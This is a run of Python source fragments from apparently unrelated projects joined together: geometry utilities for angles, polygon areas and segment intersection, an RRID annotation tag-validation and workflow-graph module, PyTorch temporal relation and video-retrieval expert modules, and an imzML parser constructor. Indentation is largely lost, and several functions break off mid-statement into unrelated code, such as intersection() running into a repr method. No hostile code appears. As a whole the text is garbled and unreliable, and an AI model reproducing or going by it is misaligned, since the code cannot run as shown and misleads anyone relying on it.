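    ]
    # sweeping clockwise from "up" we expect roughly: up -> right -> down-left
    return clockwise_sequence(edges)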
def subtract_vectors(a,b):
"""
Computes the vector difference a-b
Parameters
----------
a : (x,y) tuple
b : (x,y) tuple
Returns
-------
(x,y) tuple
"""
return (a[0]-b[0],a[1]-b[1])
def dot_product(a,b):
"""
Computes the dot-product of two vectors.
Parameters
----------
a : (x,y) tuple
b : (x,y) tuple
Returns
-------
float
"""
return a[0]*b[0] + a[1]*b[1]
def length(v):
"""
Computes the length of a vector
Parameters
----------
v : (x,y) tuple
Returns
-------
float
"""
return __m.sqrt((v[0]**2)+(v[1]**2))
def bearing(p1,p2):
"""
Computes the direction from p1 to p2
Parameters
----------
p1 : (x,y) tuple
p2 : (x,y) tuple
Returns
-------
float
The bearing in radians counter-clockwise from horizontal-right (=0).
"""
v = subtract_vectors(p2, p1)
return __m.atan2(v[1], v[0])
def angle(fulcrum,a,b):
"""
Computes the angle from a to b, measured in radians counterclockwise.
Parameters
----------
fulcrum :: (x,y) tuple
fulcrum of angle
a :: (x,y) tuple
end of one segment from fulcrum
b :: (x,y) tuple
end of other segment from fulcrum
Returns
-------
float in range [0,pi]
"""
# uses method in https://scicomp.stackexchange.com/questions/27689/numerically-stable-way-of-computing-angles-between-vectors
# which is measured to be numerically stable to ~10^-15
# get distances of triangle formed
c=distance_pts(a,b)
a=distance_pts(fulcrum,a)
b=distance_pts(fulcrum,b)
if b<0 or c<0: # this should never happen
return None
if b >= c:
mu = c-(a-b)
else:
mu = b-(a-c)
numerator=((a-b)+c)*mu
denominator=(a+(b+c))*((a-c)+b)
half_tangent = __m.sqrt(numerator/denominator)
theta = 2 * __m.atan(half_tangent)
return theta
def angle_quick(fulcrum,a,b):
    # approx. 18% faster, but errors up to ~1e-8 occur roughly once per million calls
a=subtract_vectors(a,fulcrum)
b=subtract_vectors(b, fulcrum)
dotprod = dot_product(a, b)
a = length(a)
b = length(b)
cos_theta = dotprod/(a*b)
return __m.acos(cos_theta)
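# Illustrative sketch (not part of the original module): comparing the stable
# angle() against angle_quick() on a nearly collinear configuration, where the
# acos-based formula is expected to lose precision first. The chosen points are
# arbitrary demonstration values.
def _example_angle_stability():
    fulcrum = (0.0, 0.0)
    a = (1.0, 0.0)
    b = (1.0, 1e-6)  # almost collinear with a
    stable = angle(fulcrum, a, b)
    quick = angle_quick(fulcrum, a, b)
    return stable, quick, abs(stable - quick)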
def area(pts,absolute=False):
"""
Computes the clockwise area of the polygon defined by the points.
Args:
pts: list of (x,y) tuples. Assumes last and first vertex are different.
Cannot handle if input points contain None coordinates.
absolute: if true, returns the absolute value
Returns:
float representing the area
"""
if pts[len(pts)-1] != pts[0]:
pts.append(pts[0])
a=[(pts[i+1][0]-pts[i][0])*(pts[i][1]+pts[i+1][1]) for i in range(len(pts)-1)]
A=sum(a)/2
if absolute:
return abs(A)
else:
return A
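# Illustrative sketch (not part of the original module): the sign convention of
# area() on a unit square listed clockwise (with y pointing up). Copies of the
# ring are passed because area() may append the first vertex to its input.
def _example_area_sign():
    square_cw = [(0, 0), (0, 1), (1, 1), (1, 0)]
    signed = area(list(square_cw))             # expected +1.0 for clockwise input
    unsigned = area(list(square_cw), absolute=True)
    return signed, unsigned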
def triangle_area(a,b,c, robustZero = False):
'''returns the area of the triangle
If robustZero: returns zero if
zero is calculated in any one of three ways, or
if both negative and positive values are
calculated by the different methods'''
# reduce numbers to avoid floating point precision
minx = min(a[0],b[0],c[0])
miny = min(a[1],b[1],c[1])
a,b,c=(a[0]-minx,a[1]-miny),(b[0]-minx,b[1]-miny),(c[0]-minx,c[1]-miny)
# calculate area three different ways
a1=(b[0]-a[0])*(b[1]+a[1])
a2=(c[0]-b[0])*(c[1]+b[1])
a3=(a[0]-c[0])*(c[1]+a[1])
areas = [a1+a2+a3,a2+a3+a1,a3+a1+a2]
if robustZero:
# if any are zero, return zero
if min([abs(x) for x in areas])==0:
return 0
# if there is disagreement over sign, return zero
if (areas[0] > 0) != (areas[1] > 0):
return 0
if (areas[0] > 0) != (areas[2] > 0):
return 0
# return area with minimum absolute value
w=0
if abs(areas[1])<abs(areas[0]):
w=1
if abs(areas[2])<abs(areas[w]):
w=2
area = areas[w]
return area/2
def distance_pts(a,b):
''' computes the distance between two points.
inputs should be lists of two coordinates.'''
return __m.sqrt((b[0]-a[0])**2 + (b[1]-a[1])**2)
def cycle_next(id, cycle_length):
"""
computes the next id in a cycle
Parameters
----------
id : integer
The index of an item in the cycle.
cycle_length : integer
The length of the cycle.
Returns
-------
integer
The index of the next item in the cycle
"""
if id==cycle_length-1:
return 0
else:
return id+1
def cycle_prev(id,cycle_length):
"""
computes the previous id in a cycle
Parameters
----------
id : integer
The index of an item in the cycle.
cycle_length : integer
The length of the cycle.
Returns
-------
integer
The index of the previous item in the cycle
"""
if id==0:
return cycle_length-1
else:
return id-1
def nextID_in_poly(poly, id):
"""
Determines the id of the next point on a standard polygon.
Parameters
----------
poly :: List of (x,y) tuples
Representation of a polygon, with identical first and last vertices.
id : Integer
Returns
-------
Integer
"""
if id==len(poly)-1:
return 1
elif id== len(poly)-2:
return 0
else:
return id+1
def prevID_in_poly(poly, id):
"""
Determines the id of the previous point on a standard polygon.
Parameters
----------
poly :: List of (x,y) tuples
Representation of a polygon, with identical first and last vertices.
id : Integer
Returns
-------
Integer
"""
if id==0:
return len(poly)-2
else:
return id-1
def clockwise(A,B,C):
"""Determines if points A,B & C are sequenced clockwise around a triangle.
Args:
A,B,C: (x,y) tuples
Returns:
True if points are sequenced clockwise. Result is unpredictable if points
are collinear."""
return (C[1]-A[1])*(B[0]-A[0]) > (B[1]-A[1])*(C[0]-A[0])
def intersect(A,B,C,D):
"""Quickly determines if segment AB intersects segment CD.
Args:
A,B,C,D: (x,y) tuples
Returns:
True if segments intersect. Result is unpredictable if
        lines are parallel or segments meet at an endpoint.
"""
return clockwise(A,C,D) != clockwise(B,C,D) and clockwise(A,B,C) != clockwise(A,B,D)
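# Illustrative sketch (not part of the original module): the crossing predicate
# on one crossing pair and one non-parallel, disjoint pair of segments.
def _example_intersect():
    crossing = intersect((0, 0), (2, 2), (0, 2), (2, 0))  # diagonals of a square -> True
    disjoint = intersect((0, 0), (1, 0), (2, 1), (3, 3))  # far apart -> False
    return crossing, disjoint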
def intersection(A,B,C,D,infinite=True):
""" Returns the intersection point of two lines AB & CD.
A,B,C,D and return value are all lists of two coordinates each.
If lines are parallel or do not intersect, returns a pair of Nones.
Code taken from <NAME>, pp. 48-9
Args:
A,B,C,D: (x,y) tuples
infinite: If False, will return (None, None)
Returns:
(x,y) tuple of coordinates of intersection point"""
## if ultra_precise:
## A=(Decimal(A[0]),Decimal(A[1])) # dec_pt(A)
## B=(Decimal(B[0]),Decimal(B[1])) # dec_pt(B)
## C=(Decimal(C[0]),Decimal(C[1])) # dec_pt(C)
## D=(Decimal(D[0]),Decimal(D[1])) # dec_pt(D)
if A[0]==B[0]:
if C[0]==D[0]:
xp,yp=None,None # lines are parallel
else: # first line vertical
b2=(D[1]-C[1])/(D[0]-C[0])
a2=C[1]-b2*C[0]
        tagset = '(' + _tagset + ')' if _tagset else '()'
_badset = ' '.join(sorted(t for t in self.badset))
badset = ' (' + _badset + ')' if _badset else ' ()'
_ontid_all_tags = ' '.join(sorted(t.curie for t in self.ontid_all_tags))
ontid_all_tags = ' (' + _ontid_all_tags + ')' if _ontid_all_tags else ' ()'
return f'{self.__class__.__name__}.byId({self.id!r}) # {tagset}{badset}{ontid_all_tags}'
class TagLogic(AnnoAsTags):
aat_dict = {}
def __init__(self, anno):
super().__init__(anno)
self.validate()
self.invalid = bool(self.reason_invalid)
self.valid = not self.invalid
def special_case(self): # FIXME wow is this bad
# handle info_tags
badset = set(OntId(t) if t.startswith('RRIDCUR:')
and ' ' not in t # *shakes fist angrily*
else t
for t in self.badset)
tagset = frozenset(badset | self.tagset - {None})
for itag in self.infotags:
if itag in tagset:
tagset = frozenset((t for t in tagset if t != itag))
self.warnings |= frozenset({itag})
for cv_tag, tag in self.cvtags.items():
if cv_tag in tagset:
                tagset = tagset - frozenset((cv_tag,))  # trailing comma: remove the tag itself, not its characters
                tagset |= frozenset((tag,))
self.warnings |= frozenset({cv_tag})
def rrid_safe_suffix(_):
hah = next(iter(self.RRIDcurator)) # FIXME multicase ...
return not hah.suffix in set(t.suffix
for t in self.anno_part_instances[OntId('workflow:tagCurator')])
scs = {
# TODO make sure that ONLY the workflow tags are used to retrieve values
# so that annotations with an RRID: tag that are/were unresolved have to
            # go into a special handling pipeline FIXME this implementation is NOT sufficient
('workflow:RRID',):
(rrid_safe_suffix, ('workflow:RRID', 'RRIDCUR:Missing')),
('workflow:RRID', 'RRIDCUR:Validated'):
(lambda x:True, ('RRIDCUR:Validated',)), # rrid deal with elsewhere
('workflow:RRID', 'RRIDCUR:Unresolved'): # super confusing ...
(lambda x:True, ('RRIDCUR:GiveMeAReason',)),
('workflow:RRIDscibot', 'RRIDCUR:Unresolved'):
(lambda x:True, ('RRIDCUR:Unresolved',)),
#('workflow:RRID',): ('workflow:RRID', 'RRIDCUR:Missing'),
# can't use this yet due to the bad RRID:Missing and friends issues
#('',): ('',),
}
special_cases = {}
for special, (test, case) in scs.items():
special_cases[
frozenset((OntId(s) for s in special))
] = test, frozenset((OntId(c) for c in case))
if tagset in special_cases:
test, new_tagset = special_cases[tagset]
if test(tagset):
self.warnings |= tagset
return new_tagset
else:
return None
elif self.warnings: # itags
return tagset
def validate(self):
""" validate a single reply chain """
self.reason_invalid = tuple()
if self.badset:
badset = self.badset - self.info_tags - frozenset(self.cv_tags) # FIXME make this accessible
if badset:
self.reason_invalid += ('There are bad tags.',)
if self.tagset not in self.valid_tagsets:
special_case = self.special_case() # TODO do something with special case?
if not special_case:
self.reason_invalid += ('Invalid tagset',) # TODO post possible fixes
if self.orphaned:
self.reason_invalid += ('Orphaned',)
# the tests below usually will not trigger at this stage
        # because the issue usually arises only when looking across multiple
        # reply threads, thus what we need to do is flag any reply chains that
        # have been superseded
if len(self.DOIs) > 1:
self.reason_invalid += ('Too many DOIs',)
if len(self.PMIDs) > 1:
self.reason_invalid += ('Too many PMIDs',)
if len(self.RRIDcurator) > 1:
self.reason_invalid += ('Too many curator RRIDs',)
if len(self.RRIDscibot) > 1: # only the paranoid survive
self.reason_invalid += ('Too many scibot RRIDs',)
if self.Unresolved and len(self.RRIDcurator) == 1:
curatorRRID = next(iter(self.RRIDcurator))
if curatorRRID.curie == self.putativeRRID: # putatives could break OntId, so keep as string
self.reason_invalid += ('Unresolved scibot RRID matches curator RRID',)
@property
def next_tags(self):
if self.valid:
for next_state in self.tag_transitions[self.tagset]:
yield from next_state - self.tagset
@property
def current_state(self):
if self.invalid: # modelViolated
return 'TEMP:needsQC'
else:
return 'TODO'
@property
def initiatesAction(self):
        # compute whether an action needs to be taken based on the state we are in
# NOTE this is orthogonal to terminals and endpoints
# hrm ... PDA ... HRM
if self.tagset in self.terminal_tagsets:
return self.terminal_tagsets[self.tagset]
else:
            # TODO are there states that require something else?
pass
def write(graph, path, format='nifttl'):
with open(path, 'wb') as f:
f.write(graph.serialize(format=format))
def parse_workflow():
# FIXME TODO these states should probably be compiled down to numbers???
docs = Path(__file__).parent.absolute().resolve().parent / 'docs'
rridpath = docs / 'workflow-rrid.graphml'
paperpath = docs / 'workflow-paper-id.graphml'
cgraph = ConjunctiveGraph()
gt.WorkflowMapping(rridpath.as_posix()).graph(cgraph)
gt.PaperIdMapping(paperpath.as_posix(), False).graph(cgraph)
write(cgraph, '/tmp/workflow.ttl')
predicates = set(cgraph.predicates())
OntCuries({cp:str(ip) for cp, ip in cgraph.namespaces()})
OntCuries({'RRID': 'https://scicrunch.org/resolver/RRID:',
'DOI': 'https://doi.org/',
'PMID': 'https://www.ncbi.nlm.nih.gov/pubmed/'})
hg = makeGraph('', graph=cgraph)
short = sorted(hg.qname(_) for _ in predicates)
wf.hasTag
wf.hasReplyTag
wf.hasTagOrReplyTag
wf.hasOutputTag
#if type isa wf.tag
tag_types = set(cgraph.transitive_subjects(rdfs.subClassOf, wf.tag))
tag_tokens = {tagType:sorted(set(t for t in cgraph.transitive_subjects(rdf.type, tagType)
if t != tagType))
for tagType in tag_types}
has_tag_types = set(cgraph.transitive_subjects(rdfs.subPropertyOf, wf.hasTagOrReplyTag))
has_tag_types.add(wf.hasOutputTag)
has_next_action_types = set(cgraph.transitive_subjects(rdfs.subPropertyOf, wf.hasOutput))
has_next_action_types.add(wf.hasNextStep)
terminals = sorted(tag
for ttype in tag_types
if ttype != wf.tagScibot # scibot is not 'terminal' for this part
for tag in cgraph[:rdf.type:ttype]
if not isinstance(tag, BNode)
and not any(o for httype in has_tag_types
for o in cgraph[tag:httype]))
endpoints = sorted(endpoint
for endpoint in cgraph[:rdf.type:wf.state]
if not isinstance(endpoint, BNode)
and not any(o for hnatype in has_next_action_types
for o in cgraph[endpoint:hnatype]))
complicated = sorted(a_given_tag
for tt in tag_types
for a_given_tag in cgraph[:rdf.type:tt]
if not isinstance(a_given_tag, BNode)
and not [successor_tag
for htt in has_tag_types
for successor_tag in chain(t
for t in cgraph[a_given_tag:htt]
#if not isinstance(t, BNode)
,
# we don't actually need this for terminals
# we will need it later
#(t for b in cgraph[a_given_tag:htt]
#if isinstance(b, BNode)
#for listhead in cgraph[b:owl.oneOf]
#for t in unlist(listhead, cgraph)),
)])
def topList(node, g):
for s in g[:rdf.rest:node]:
yield s
def getLists(node, g):
for linker in g[:rdf.first:node]:
top = None
for top in g.transitiveClosure(topList, linker):
pass
if top:
yield top
else:
yield linker
def getIsTagOf(node, g):
for htt in has_tag_types:
for parent_tag in g[:htt:node]:
yield parent_tag
def getIsOneOfTagOf(node, g):
for list_top in getLists(node, g):
for linker in g[:owl.oneOf:list_top]:
for parent_tag, _ in g[::linker]:
yield parent_tag
def getPreviousTag(node, g): # not quite what we need
yield from getIsOneOfTagOf(node, g)
yield from getIsTagOf(node, g)
def getTagChains(node, g, seen=tuple()):
# seen to prevent recursion cases where
        # tagging can occur in either order e.g. PMID -> DOI
#print(tc.red(repr(OntId(node)))) # tc.red(OntId(node)) does weird stuff O_o
parent_tag = None
for parent_tag in chain(getIsOneOfTagOf(node, g),
getIsTagOf(node, g)):
if parent_tag in seen:
parent_tag = None
continue
ptt = next(g[parent_tag:rdf.type])
#if ptt in tag_types:
for pchain in getTagChains(parent_tag, g, seen + (node,)):
if ptt in tag_types:
out = parent_tag, *pchain
else:
out = pchain
yield out
if not ptt and not out:
parent_tag = None
if not parent_tag:
yield tuple()
def getInitiatesAction(node, g):
for action in g[:wf.initiatesAction:node]:
yield action
def getIsOneOfOutputOf(node, g):
for list_top in getLists(node, g):
for linker in g[:owl.oneOf:list_top]:
for hot in has_next_action_types:
for parent_thing in g[:hot:linker]:
yield parent_thing
def getActionChains(node, g):
parent_action = None
for parent_action in chain(getIsOneOfOutputOf(node, g), # works for actions too
getInitiatesAction(node, g)):
for pchain in getActionChains(parent_action, g): # NOTE may also be a tag...
out = parent_action, *pchain
#print(tuple(hg.qname(o) for o in out))
yield out
if not parent_action:
yield tuple()
def getRestSubjects(predicate, object, g):
""" invert restriction """
rsco = cmb.Restriction(rdfs.subClassOf)
for rt in rsco.parse(graph=g):
if rt.p == predicate and rt.o == object:
yield from g.transitive_subjects(rdfs.subClassOf, rt.s)
annoParts = list(getRestSubjects(wf.isAttachedTo, wf.annotation, cgraph))
partInstances = {OntId(a):set(t if isinstance(t, BNode) else OntId(t)
for t in cgraph.transitive_subjects(rdf.type, a)
if not isinstance(t, BNode) and t != a)
for a in annoParts}
_endpoint_chains = {OntId(endpoint):[[OntId(endpoint)] + [OntId(e) for e in chain]
for chain in getActionChains(endpoint, cgraph)]
for endpoint in endpoints}
#print([hg.qname(e) for e in endpoints])
#print([print([hg.qname(c) for c in getActionChains(endpoint, cgraph) if c])
#for endpoint in endpoints
#if endpoint])
#_ = [print(list(getActionChains(e, cgraph)) for e in endpoints)]
#return
wat = cgraph.transitiveClosure(getPreviousTag, RRIDCUR.Duplicate)
wat = list(wat)
#def invOneOf(tag, g):
fake_chains = {hg.qname(terminal):
[hg.qname(c)
for c in cgraph.transitiveClosure(getPreviousTag, terminal)]
for terminal in terminals}
def make_chains(things, getChains):
return {OntId(thing):[[OntId(thing)] + [OntId(e) for e in chain]
for chain in getChains(thing, cgraph)]
for thing in things
#if not print(thing)
}
def print_chains(thing_chains):
print('\nstart from beginning')
print('\n'.join(sorted(' -> '.join(hg.qname(e) for e in reversed(chain))
for chains in thing_chains.values()
for chain in chains)))
print('\nstart from end')
print('\n'.join(sorted(' <- '.join(e.curie for e in chain)
for chains in thing_chains.values()
for chain in chains)))
def valid_tagsets(all_chains):
# not the most efficient way to do this ...
transitions = defaultdict(set)
for end, chains in all_chains.items():
for chain in chains:
valid = set()
prior_state = None
for element in reversed(chain):
valid.add(element)
state = frozenset(valid)
transitions[prior_state].add(state)
prior_state = state
        return {s: frozenset(n) for s, n in transitions.items()}
        msg = 'Multi-Scale Temporal Relation Network Module in use'
print(msg, ['%d-frame relation' % i for i in self.scales])
def forward(self, input):
# the first one is the largest scale
act_all = input[:, self.relations_scales[0][0] , :]
act_all = act_all.view(act_all.size(0), self.scales[0] * self.img_feature_dim)
act_all = self.fc_fusion_scales[0](act_all)
for scaleID in range(1, len(self.scales)):
# iterate over the scales
idx_relations_randomsample = np.random.choice(
len(self.relations_scales[scaleID]),
self.subsample_scales[scaleID],
replace=False,
)
for idx in idx_relations_randomsample:
act_relation = input[:, self.relations_scales[scaleID][idx], :]
act_relation = act_relation.view(act_relation.size(0), self.scales[scaleID] * self.img_feature_dim)
act_relation = self.fc_fusion_scales[scaleID](act_relation)
act_all += act_relation
return act_all
def return_relationset(self, num_frames, num_frames_relation):
import itertools
return list(itertools.combinations([i for i in range(num_frames)], num_frames_relation))
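# Worked example (added for illustration, not from the original source) of what
# return_relationset produces for 4 frames: every k-frame relation is simply a
# k-combination of frame indices, e.g.
#   return_relationset(4, 2) -> [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3)]
#   return_relationset(4, 3) -> [(0, 1, 2), (0, 1, 3), (0, 2, 3), (1, 2, 3)]
# and the forward pass samples a few of these index tuples per scale.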
class RelationModuleMultiScale_Cat(th.nn.Module):
    # Temporal Relation module in multiple scales, summing over [2-frame relation, 3-frame relation, ..., n-frame relation]
def __init__(self, img_feature_dim, num_frames, num_class):
super(RelationModuleMultiScale_Cat, self).__init__()
self.subsample_num = 3 # how many relations selected to sum up
self.img_feature_dim = img_feature_dim
self.scales = [i for i in range(num_frames, 1, -1)] # generate the multiple frame relations
self.relations_scales = []
self.subsample_scales = []
for scale in self.scales:
relations_scale = self.return_relationset(num_frames, scale)
self.relations_scales.append(relations_scale)
self.subsample_scales.append(min(self.subsample_num, len(relations_scale))) # how many samples of relation to select in each forward pass
self.num_class = num_class
self.num_frames = num_frames
num_bottleneck = 256
self.fc_fusion_scales = nn.ModuleList() # high-tech modulelist
for i in range(len(self.scales)):
scale = self.scales[i]
fc_fusion = nn.Sequential(
nn.ReLU(),
nn.Linear(scale * self.img_feature_dim, num_bottleneck),
nn.ReLU(),
nn.Linear(num_bottleneck, self.num_class),
)
self.fc_fusion_scales += [fc_fusion]
print('Multi-Scale Temporal Relation Network Module in use', ['%d-frame relation' % i for i in self.scales])
def forward(self, input):
record = []
# the first one is the largest scale
act_all = input[:, self.relations_scales[0][0] , :]
act_all = act_all.view(act_all.size(0), self.scales[0] * self.img_feature_dim)
act_all = self.fc_fusion_scales[0](act_all)
norm = act_all.norm(p=2, dim=-1, keepdim=True)
act_all = act_all.div(norm)
record.append(act_all)
for scaleID in range(1, len(self.scales)):
# iterate over the scales
idx_relations_randomsample = np.random.choice(len(self.relations_scales[scaleID]), self.subsample_scales[scaleID], replace=False)
act_all = 0
for idx in idx_relations_randomsample:
act_relation = input[:, self.relations_scales[scaleID][idx], :]
act_relation = act_relation.view(act_relation.size(0), self.scales[scaleID] * self.img_feature_dim)
act_relation = self.fc_fusion_scales[scaleID](act_relation)
act_all += act_relation
norm = act_all.norm(p=2, dim=-1, keepdim=True)
act_all = act_all.div(norm)
record.append(act_all)
act_all = th.cat((record), 1)
return act_all
def return_relationset(self, num_frames, num_frames_relation):
import itertools
return list(itertools.combinations([i for i in range(num_frames)],
num_frames_relation))
class CEModule(nn.Module):
def __init__(self, expert_dims, text_dim, use_ce, verbose, l2renorm, num_classes,
trn_config, trn_cat, use_mish, include_self, num_h_layers, num_g_layers,
disable_nan_checks, random_feats, test_caption_mode, mimic_ce_dims,
concat_experts, concat_mix_experts, freeze_weights, task,
keep_missing_modalities, vlad_feat_sizes, same_dim, use_bn_reason):
super().__init__()
modalities = list(expert_dims.keys())
self.expert_dims = expert_dims
self.modalities = modalities
self.disable_nan_checks = disable_nan_checks
self.mimic_ce_dims = mimic_ce_dims
self.concat_experts = concat_experts
self.same_dim = same_dim
self.use_mish = use_mish
self.use_bn_reason = use_bn_reason
self.num_h_layers = num_h_layers
self.num_g_layers = num_g_layers
self.include_self = include_self
self.num_classes = num_classes
self.task = task
self.vlad_feat_sizes = vlad_feat_sizes
self.concat_mix_experts = concat_mix_experts
self.test_caption_mode = test_caption_mode
self.reduce_dim = 64
self.moe_cg = ContextGating
self.freeze_weights = freeze_weights
self.random_feats = random_feats
self.use_ce = use_ce
self.verbose = verbose
self.keep_missing_modalities = keep_missing_modalities
self.l2renorm = l2renorm
self.trn_config = trn_config
self.trn_cat = trn_cat
print("trn_config is {}".format(self.trn_config))
if self.use_mish:
self.non_lin = Mish()
else:
self.non_lin = nn.ReLU()
if "retrieval" in self.task:
num_mods = len(expert_dims)
self.moe_fc = nn.Linear(text_dim, len(expert_dims))
# self.moe_fc_bottleneck1 = nn.Linear(text_dim, text_dim // 4)
# self.moe_cg = nn.Linear(text_dim // 4, text_dim // 4)
# self.moe_fc_proj = nn.Linear(text_dim // 4, len(expert_dims))
self.moe_weights = th.ones(1, num_mods) / num_mods
# The batch size of the face input can vary (due to missing inputs), so we
# probably shouldn't use BN on this branch. It's probably fine to leave it
            # on for the corresponding text inputs (but we should switch to GN)
use_bns = [True for modality in self.modalities]
# NOTE: When use_ce is not used, the text features are projected to
# subspaces of different dimensions. When use_ce is used, they must all
        # be projected to `same_dim` (to allow fusion). The only exception is for an
# ablation in which we mimic the `same_dim` reduction to measure whether this
# projection influences overall performance.
self.trn_list = nn.ModuleList()
self.repeat_temporal = {}
for mod in modalities:
self.repeat_temporal[mod] = 1
if self.trn_cat == 2:
print("Performing concat between random temporal attention")
for mod in self.trn_config.keys():
img_feature_dim = expert_dims[mod][0] # 365
num_frames = self.trn_config[
                    mod] # This is exactly how many different attentions
num_frames = 1 # mimic simple avg and max based on segments
# num_class = expert_dims[mod][0]
self.trn_list += [TemporalAttention(img_feature_dim, num_frames)]
self.repeat_temporal[mod] = num_frames + 2
elif self.trn_cat == 1:
print("Performing concat between segments")
for mod in self.trn_config.keys():
img_feature_dim = expert_dims[mod][0] # 365
num_frames = self.trn_config[mod] # hard code
num_class = expert_dims[mod][0]
self.trn_list += [
RelationModuleMultiScale_Cat(img_feature_dim, num_frames, num_class)
]
self.repeat_temporal[mod] = len(
[i for i in range(num_frames, 1, -1)])
elif self.trn_cat == 0:
print("Performing Conventional TRN (sum) segments")
for mod in self.trn_config.keys():
img_feature_dim = expert_dims[mod][0] # 365
num_frames = self.trn_config[mod] # hard code
num_class = expert_dims[mod][0]
self.trn_list += [
RelationModuleMultiScale(img_feature_dim, num_frames,
num_class)
]
else:
raise NotImplementedError()
in_dims = [expert_dims[mod][0] * self.repeat_temporal[mod] for mod in modalities]
agg_dims = [expert_dims[mod][1] * self.repeat_temporal[mod] for mod in modalities]
if self.use_ce or self.mimic_ce_dims:
dim_reducers = [ReduceDim(in_dim, same_dim) for in_dim in in_dims]
self.video_dim_reduce = nn.ModuleList(dim_reducers)
if self.use_ce:
# The g_reason module has a first layer that is specific to the design choice
# (e.g. triplet vs pairwise), then a shared component which is common to all
# designs.
if self.use_ce in {"pairwise", "pairwise-star", "triplet"}:
num_inputs = 3 if self.use_ce == "triplet" else 2
self.g_reason_1 = nn.Linear(same_dim * num_inputs, same_dim)
elif self.use_ce == "pairwise-star-specific":
num_inputs = 2
g_reason_unshared_weights = [G_reason(same_dim, num_inputs, self.non_lin)
for mod in modalities]
self.g_reason_unshared_weights = nn.ModuleList(g_reason_unshared_weights)
elif self.use_ce in {"pairwise-star-tensor"}:
reduce_dim = self.reduce_dim
self.dim_reduce = nn.Linear(same_dim, reduce_dim)
self.g_reason_1 = nn.Linear(self.reduce_dim * reduce_dim, same_dim)
else:
raise ValueError(f"unrecognised CE config: {self.use_ce}")
g_reason_shared = []
for _ in range(self.num_g_layers - 1):
if self.use_bn_reason:
g_reason_shared.append(nn.BatchNorm1d(same_dim))
g_reason_shared.append(self.non_lin)
g_reason_shared.append(nn.Linear(same_dim, same_dim))
self.g_reason_shared = nn.Sequential(*g_reason_shared)
h_reason = []
for _ in range(self.num_h_layers):
if self.use_bn_reason:
h_reason.append(nn.BatchNorm1d(same_dim))
h_reason.append(self.non_lin)
h_reason.append(nn.Linear(same_dim, same_dim))
self.h_reason = nn.Sequential(*h_reason)
gated_vid_embds = [GatedEmbeddingUnitReasoning(same_dim) for _ in in_dims]
text_out_dims = [same_dim for _ in agg_dims]
elif self.mimic_ce_dims: # ablation study
gated_vid_embds = [MimicCEGatedEmbeddingUnit(same_dim, same_dim, use_bn=True)
for _ in modalities]
text_out_dims = [same_dim for _ in agg_dims]
elif self.concat_mix_experts: # ablation study
# use a single large GEU to mix the experts - the output will be the sum
# of the aggregation sizes
in_dim, out_dim = sum(in_dims), sum(agg_dims)
gated_vid_embds = [GatedEmbeddingUnit(in_dim, out_dim, use_bn=True)]
elif self.concat_experts: # ablation study
# We do not use learnable parameters for the video combination, (we simply
# use a high dimensional inner product).
gated_vid_embds = []
else:
gated_vid_embds = [GatedEmbeddingUnit(in_dim, dim, use_bn) for
in_dim, dim, use_bn in zip(in_dims, agg_dims, use_bns)]
text_out_dims = agg_dims
self.video_GU = nn.ModuleList(gated_vid_embds)
if "retrieval" in self.task:
if self.concat_experts:
gated_text_embds = [nn.Sequential()]
elif self.concat_mix_experts:
                # As with the video inputs, we similarly use a single large GEU for the
# text embedding
gated_text_embds = [GatedEmbeddingUnit(text_dim, sum(agg_dims),
use_bn=True)]
else:
gated_text_embds = [GatedEmbeddingUnit(text_dim, dim, use_bn=True) for
dim in text_out_dims]
self.text_GU = nn.ModuleList(gated_text_embds)
else:
print("V. simple classifier, should update....")
total_dim = 0
for mod in self.expert_dims.keys():
total_dim += self.expert_dims[mod][1] * self.repeat_temporal[mod]
print(f"Total dim is {total_dim}")
self.classifier = nn.Linear(total_dim, self.num_classes)
def compute_moe_weights(self, text, ind):
# compute weights for all captions (including when assigned K captions to
# the same video)
B, K, D = text.shape
M = len(self.modalities)
msg = f"expected between 1 and 10 modalities, found {M} ({self.modalities})"
assert 1 <= M <= 10, msg
# Treat each caption independently in the softmax (which runs over modalities)
text = text.view(B * K, D)
if self.freeze_weights:
moe_weights = self.moe_weights.repeat(B, K, 1)
if text.is_cuda:
moe_weights = moe_weights.cuda()
else:
# if False:
# print("USING BIGGER WEIGHT PREDS")
# moe_weights = self.moe_fc_bottleneck1(text)
# moe_weights = self.moe_cg(moe_weights)
# moe_weights = self.moe_fc_proj(moe_weights)
# moe_weights = moe_weights * 1
# else:
moe_weights = self.moe_fc(text) # BK x D -> BK x M
moe_weights = F.softmax(moe_weights, dim=1)
moe_weights = moe_weights.view(B, K, M)
if self.verbose:
print("--------------------------------")
for idx, key in enumerate(self.modalities):
msg = "{}: mean: {:.3f}, std: {:.3f}, min: {:.3f}, max: {:.3f}"
msg = msg.format(
key,
moe_weights[:, :, idx].mean().item(),
moe_weights[:, :, idx].std().item(),
moe_weights[:, :, idx].min().item(),
moe_weights[:, :, idx].max().item(),
)
print(msg)
return moe_weights
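    # Shape sketch for compute_moe_weights (added for illustration, not from the
    # original source). With B videos, K captions per video and M experts:
    #   text                      -> (B, K, text_dim)
    #   reshape + self.moe_fc     -> (B*K, M) logits
    #   softmax over the M axis   -> each caption gets a convex weighting
    #   reshape                   -> (B, K, M) returned as moe_weights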
def forward(self, text, experts, ind, raw_captions):
"""Compute joint embeddings | |
from the .ibd file is needed (getspectrum calls will not work)
"""
ImzMLParserBase.__init__(self)
t_start = time.time()
# custom map sizes are currently not supported, therefore mapsize is hardcoded.
# ElementTree requires the schema location for finding tags (why?) but
# fails to read it from the root element. As this should be identical
# for all imzML files, it is hard-coded here and prepended before every tag
self.sl = "{http://psi.hupo.org/ms/mzml}"
# maps each imzML number format to its struct equivalent
self.precisionDict = dict(PRECISION_DICT)
# maps each number format character to its amount of bytes used
self.sizeDict = dict(SIZE_DICT)
self.filename = filename
self.root = None
self.mzGroupId = self.intGroupId = None
self._parse_lib = parse_lib
# select iterator
self.__iter_read_spectrum_meta()
# get binary data handle
if ibd_file is None:
# name of the binary file
ibd_filename = self._infer_bin_filename(self.filename)
self.ibd_filename = ibd_filename
elif isinstance(ibd_file, str):
self.ibd_filename = ibd_file
else:
if hasattr(ibd_file, "name"):
self.ibd_filename = ibd_file.name
else:
raise ValueError("The `ibd_file` signature was changed. Please provide filename or open object")
        # Dict for basic imzML metadata other than those required for reading spectra. See method __read_imzml_metadata()
self.imzmldict = self.__read_imzml_metadata()
self.imzmldict["max count of pixels z"] = np.asarray(self.coordinates)[:, 2].max()
# multi-core support for image generation
self._as_threads = as_threads
self._pool_size = 2 if self._as_threads else pool_size
# setup executor
self.executor = (
ThreadPoolExecutor(self._pool_size) if self._as_threads else ProcessPoolExecutor(self._pool_size)
